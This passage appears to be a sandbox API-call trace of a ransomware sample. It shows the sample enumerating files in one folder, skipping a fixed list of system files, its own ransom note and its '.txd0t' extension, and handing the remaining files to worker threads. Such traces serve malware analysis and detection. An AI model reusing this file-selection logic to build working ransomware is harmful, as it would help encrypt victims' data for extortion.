(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0086.901] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.924] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.924] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\header.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" [0086.924] SetEvent (hEvent=0x410) returned 1 [0086.924] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0086.924] StrCmpW (psz1="netfx_Core.mzz", psz2=".") returned 1 [0086.925] StrCmpW (psz1="netfx_Core.mzz", psz2="..") returned 1 [0086.925] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.925] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.925] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core.mzz", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned="C:\\588bce7c90097ed212\\netfx_Core.mzz" [0086.925] PathFindExtensionW (pszPath="netfx_Core.mzz") returned=".mzz" [0086.925] StrCmpW (psz1=".mzz", psz2=".txd0t") returned -1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="bootsect.bak") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="iconcache.db") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="thumbs.db") returned -1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2=" ransomware ") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2=" ransom ") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="debug.txt") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="boot.ini") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="desktop.ini") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="autorun.inf") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="ntuser.dat") returned -1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="ntldr") returned -1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="ntdetect.com") returned -1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="bootfont.bin") returned 1 [0086.925] StrCmpIW (psz1="netfx_Core.mzz", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.925] PathFindExtensionW (pszPath="netfx_Core.mzz") returned=".mzz" [0086.925] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mzz") returned 0x0 [0086.925] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0086.966] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.966] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\netfx_Core.mzz", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" [0086.966] SetEvent (hEvent=0x408) returned 1 [0086.966] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0086.966] StrCmpW (psz1="netfx_Core_x64.msi", psz2=".") returned 1 [0086.966] StrCmpW (psz1="netfx_Core_x64.msi", psz2="..") returned 1 [0086.966] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.971] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.971] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x64.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" [0086.971] PathFindExtensionW (pszPath="netfx_Core_x64.msi") returned=".msi" [0086.971] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="bootsect.bak") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="iconcache.db") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="thumbs.db") returned -1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2=" ransomware ") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2=" ransom ") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="debug.txt") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="boot.ini") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="desktop.ini") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="autorun.inf") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="ntuser.dat") returned -1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="ntldr") returned -1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="ntdetect.com") returned -1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="bootfont.bin") returned 1 [0086.971] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.971] PathFindExtensionW (pszPath="netfx_Core_x64.msi") returned=".msi" [0086.971] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0086.971] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.007] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.007] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\netfx_Core_x64.msi", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" [0087.007] SetEvent (hEvent=0x418) returned 1 [0087.007] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0087.007] StrCmpW (psz1="netfx_Core_x86.msi", psz2=".") returned 1 [0087.007] StrCmpW (psz1="netfx_Core_x86.msi", psz2="..") returned 1 [0087.007] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.007] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.007] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x86.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" [0087.007] PathFindExtensionW (pszPath="netfx_Core_x86.msi") returned=".msi" [0087.007] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0087.007] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="bootsect.bak") returned 1 [0087.007] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="iconcache.db") returned 1 [0087.007] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="thumbs.db") returned -1 [0087.007] StrCmpIW (psz1="netfx_Core_x86.msi", psz2=" ransomware ") returned 1 [0087.007] StrCmpIW (psz1="netfx_Core_x86.msi", psz2=" ransom ") returned 1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="debug.txt") returned 1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="boot.ini") returned 1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="desktop.ini") returned 1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="autorun.inf") returned 1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="ntuser.dat") returned -1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="ntldr") returned -1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="ntdetect.com") returned -1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="bootfont.bin") returned 1 [0087.008] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.008] PathFindExtensionW (pszPath="netfx_Core_x86.msi") returned=".msi" [0087.008] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0087.008] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0087.044] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.044] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\netfx_Core_x86.msi", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" [0087.045] SetEvent (hEvent=0x3fc) returned 1 [0087.045] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0087.045] StrCmpW (psz1="netfx_Extended.mzz", psz2=".") returned 1 [0087.046] StrCmpW (psz1="netfx_Extended.mzz", psz2="..") returned 1 [0087.046] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.046] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.046] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended.mzz", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned="C:\\588bce7c90097ed212\\netfx_Extended.mzz" [0087.046] PathFindExtensionW (pszPath="netfx_Extended.mzz") returned=".mzz" [0087.046] StrCmpW (psz1=".mzz", psz2=".txd0t") returned -1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="bootsect.bak") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="iconcache.db") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="thumbs.db") returned -1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2=" ransomware ") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2=" ransom ") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="debug.txt") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="boot.ini") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="desktop.ini") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="autorun.inf") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="ntuser.dat") returned -1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="ntldr") returned -1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="ntdetect.com") returned -1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="bootfont.bin") returned 1 [0087.046] StrCmpIW (psz1="netfx_Extended.mzz", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.046] PathFindExtensionW (pszPath="netfx_Extended.mzz") returned=".mzz" [0087.046] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mzz") returned 0x0 [0087.046] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0087.156] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.156] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\netfx_Extended.mzz", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" [0087.156] SetEvent (hEvent=0x410) returned 1 [0087.156] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0087.156] StrCmpW (psz1="netfx_Extended_x64.msi", psz2=".") returned 1 [0087.156] StrCmpW (psz1="netfx_Extended_x64.msi", psz2="..") returned 1 [0087.156] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.156] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.156] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x64.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" [0087.156] PathFindExtensionW (pszPath="netfx_Extended_x64.msi") returned=".msi" [0087.156] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="bootsect.bak") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="iconcache.db") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="thumbs.db") returned -1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2=" ransomware ") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2=" ransom ") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="debug.txt") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="boot.ini") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="desktop.ini") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="autorun.inf") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="ntuser.dat") returned -1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="ntldr") returned -1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="ntdetect.com") returned -1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="bootfont.bin") returned 1 [0087.156] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.156] PathFindExtensionW (pszPath="netfx_Extended_x64.msi") returned=".msi" [0087.156] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0087.156] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0087.446] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.446] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" [0087.446] SetEvent (hEvent=0x3fc) returned 1 [0087.446] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0087.447] StrCmpW (psz1="netfx_Extended_x86.msi", psz2=".") returned 1 [0087.447] StrCmpW (psz1="netfx_Extended_x86.msi", psz2="..") returned 1 [0087.447] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.447] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.447] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x86.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" [0087.447] PathFindExtensionW (pszPath="netfx_Extended_x86.msi") returned=".msi" [0087.447] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="bootsect.bak") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="iconcache.db") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="thumbs.db") returned -1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2=" ransomware ") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2=" ransom ") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="debug.txt") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="boot.ini") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="desktop.ini") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="autorun.inf") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="ntuser.dat") returned -1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="ntldr") returned -1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="ntdetect.com") returned -1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="bootfont.bin") returned 1 [0087.447] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.447] PathFindExtensionW (pszPath="netfx_Extended_x86.msi") returned=".msi" [0087.447] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0087.447] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.619] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.619] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" [0087.619] SetEvent (hEvent=0x408) returned 1 [0087.620] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0087.620] StrCmpW (psz1="ParameterInfo.xml", psz2=".") returned 1 [0087.620] StrCmpW (psz1="ParameterInfo.xml", psz2="..") returned 1 [0087.620] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.620] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.620] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="ParameterInfo.xml", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned="C:\\588bce7c90097ed212\\ParameterInfo.xml" [0087.620] PathFindExtensionW (pszPath="ParameterInfo.xml") returned=".xml" [0087.620] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="bootsect.bak") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="iconcache.db") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="thumbs.db") returned -1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2=" ransomware ") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2=" ransom ") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="debug.txt") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="boot.ini") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="desktop.ini") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="autorun.inf") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="ntuser.dat") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="ntldr") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="ntdetect.com") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="bootfont.bin") returned 1 [0087.620] StrCmpIW (psz1="ParameterInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.620] PathFindExtensionW (pszPath="ParameterInfo.xml") returned=".xml" [0087.620] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0087.620] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.649] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.649] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\ParameterInfo.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" [0087.649] SetEvent (hEvent=0x418) returned 1 [0087.649] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 